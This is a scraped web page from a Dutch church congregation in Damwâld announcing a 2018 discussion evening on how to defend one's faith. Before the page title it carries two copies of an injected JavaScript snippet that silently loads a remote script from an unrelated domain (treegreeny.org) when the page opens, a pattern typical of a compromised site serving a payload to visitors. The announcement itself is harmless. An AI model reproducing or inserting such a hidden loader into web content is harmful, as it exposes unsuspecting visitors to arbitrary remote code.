;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gespreksavond: Hoe verdedig ik mijn geloof? - PKN Damwâld
1 november 2018
20:00 t/m 21:30
de Ontmoeting
Gespreksavond: Hoe verdedig ik mijn geloof?

Enige tijd geleden hebben we in de groep Vorming en Toerusting overlegd over het programma voor gespreksavonden en gespreksgroepen in dit seizoen. Een aantal oudere groepen zijn in de vorige Paadwizer al aangekondigd. Daarnaast hebben we een aantal onderwerpen uitgezocht waarvan we denken dat die voor onze gemeente van belang zijn. Ds. Otter, Robert Colijn en ik hebben daar ieder een van gekozen om mee aan de slag te gaan.
Aan mij is ten deel gevallen: de verdediging van ons geloof. We merken in onze tijd, dat er tal van vragen worden gesteld bij het geloof. Er zijn vragen bij die alleen maar voortkomen uit een anti-houding, maar er zijn ook echte vragen bij, waar mensen mee worstelen, en soms hopen ze op een antwoord van onze kant. Maar zijn wij in staat om daar goed op te reageren? Wat moet je zeggen, hoe kun je uitleggen waarom je in deze tijd gelooft?
Ik wil daarover een avond beleggen, en wel op donderdag 1 november om 20 uur in “De Ontmoeting”. Het zal van de respons en de behoefte afhangen of er later in het seizoen een vervolg op komt. Maar in elk geval: welkom op 1 november.

Ds. S. Boukes

Locatie: de OntmoetingFoarwei 38, 9104 BX Damwâld